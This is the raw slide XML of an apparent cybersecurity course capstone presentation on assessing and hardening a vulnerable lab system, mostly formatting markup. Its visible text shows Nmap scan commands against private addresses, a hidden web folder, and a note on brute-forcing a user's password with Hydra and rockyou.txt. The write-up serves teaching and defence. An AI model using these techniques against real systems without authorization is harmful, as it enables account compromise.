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30"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="280" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="279" r:id="rId12"/>
    <p:sldId id="281" r:id="rId13"/>
    <p:sldId id="282" r:id="rId14"/>
    <p:sldId id="265" r:id="rId15"/>
    <p:sldId id="285" r:id="rId16"/>
    <p:sldId id="286"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9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId31"/>
      <p:bold r:id="rId32"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId34"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bahnschrift SemiLight Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId36"/>
      <p:bold r:id="rId37"/>
      <p:italic r:id="rId38"/>
      <p:boldItalic r:id="rId39"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId40"/>
      <p:bold r:id="rId41"/>
      <p:italic r:id="rId42"/>
      <p:boldItalic r:id="rId43"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId44"/>
      <p:bold r:id="rId45"/>
      <p:italic r:id="rId46"/>
      <p:boldItalic r:id="rId47"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin"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F6BCEED-9C9C-4DCA-86FA-E23D2A305F18}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="257"/>
            <p14:sldId id="258"/>
            <p14:sldId id="259"/>
            <p14:sldId id="260"/>
            <p14:sldId id="261"/>
            <p14:sldId id="262"/>
            <p14:sldId id="280"/>
            <p14:sldId id="263"/>
            <p14:sldId id="264"/>
            <p14:sldId id="279"/>
            <p14:sldId id="281"/>
            <p14:sldId id="282"/>
            <p14:sldId id="265"/>
            <p14:sldId id="285"/>
            <p14:sldId id="286"/>
            <p14:sldId id="266"/>
            <p14:sldId id="267"/>
            <p14:sldId id="268"/>
            <p14:sldId id="269"/>
            <p14:sldId id="270"/>
            <p14:sldId id="271"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Untitled Section" id="{BCD7BEA7-00B7-4AEF-9309-64D71DD3AD01}">
          <p14:sldIdLst>
            <p14:sldId id="272"/>
            <p14:sldId id="273"/>
            <p14:sldId id="274"/>
            <p14:sldId id="275"/>
            <p14:sldId id="276"/>
            <p14:sldId id="277"/>
          </p14:sldIdLst>
        </p14:section>
      </p14:sectionLst>
    </p:ex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Brantsch" initials="RB" lastIdx="2" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="24d5e2a2b0f6da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850CC8-44EC-4B3D-A968-7F47EAFDB489}">
  <a:tblStyle styleId="{B9850CC8-44EC-4B3D-A968-7F47EAFDB4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37" d="100"/>
          <a:sy n="137" d="100"/>
        </p:scale>
        <p:origin x="864" y="216"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz"/>
        <p:guide orient="horz" pos="223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818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469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8623a2bef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623a2bef4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8798eb4c44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054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sv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6.png"/><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7.sv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47.sv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176643"/>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latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Capstone Engagement</a:t>
            </a:r>
            <a:endParaRPr sz="4800" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Assessment, Analysis, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2800" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2800" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>and Hardening of a Vulnerable System</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Richard Brantsch</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FF015DE-A9FA-4147-A0A2-72C524F8887E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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a:t>
            </a:fld>
            <a:endParaRPr sz="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AU" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Open Port 80 &amp; Directory Listing Enabled</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>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Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1122" name="Google Shape;1122;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="492458" y="813910"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1123" name="Google Shape;1123;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5"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DA55226-C51B-4BC7-AE68-14732B1BC30D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="726582" y="1495150"/>
            <a:ext cx="3710729" cy="781502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EFDF225-3A82-4F28-B562-7372D21C8082}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1934974" y="1259140"/>
            <a:ext cx="1293944" cy="267381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Nmap –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> 192.168.1.2/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F368499E-F29C-495C-A182-AD40506ED7C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5004427" y="1258763"/>
            <a:ext cx="3601922" cy="1116749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E74FC54A-CC1A-4ADD-ADF8-3D7328320147}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5985107" y="1024124"/>
            <a:ext cx="1394934" cy="267381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Nmap –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –A 192.168.1.105</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C48B744B-BA64-402F-9213-0358B7D53911}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1471707" y="2791849"/>
            <a:ext cx="2220480" cy="267381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Navigating to the Webserver at 192.168.1.105</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3AE2BD8-AA63-4BB5-BAB1-7E7A47BDE24F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304130" y="3063016"/>
            <a:ext cx="2555635" cy="1618995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44011E8F-A584-42D8-80D9-0CF9679E34FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5284236" y="3197277"/>
            <a:ext cx="2796677" cy="1484734"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA538227-AFBB-47CE-83ED-13ABC201A55B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4723040" y="2694561"/>
            <a:ext cx="4238661" cy="462050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Confirmed the existence of a “Secret Folder” at 192.168.1.105/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>meet_our_team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/ashton.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>(Folder couldn't be accessed due to missing login credentials) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{768E144C-E586-4A45-9F6D-3C8FF2FB1455}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle: Rounded Corners 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{664AE738-A294-4B00-BBB4-8302F3081A73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5506872" y="4339988"/>
            <a:ext cx="1514901" cy="109182"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cmpd="dbl">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AU" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Brute-Force Attack, CWE-307 &amp; Weak Hashed Passwords</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2400" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>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Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112;p62"/>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2"/>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200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</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Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I used Hydra in combination with a password list file called “rockyou.txt” to crack Ashtons password.</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lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs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Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I also used the website </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
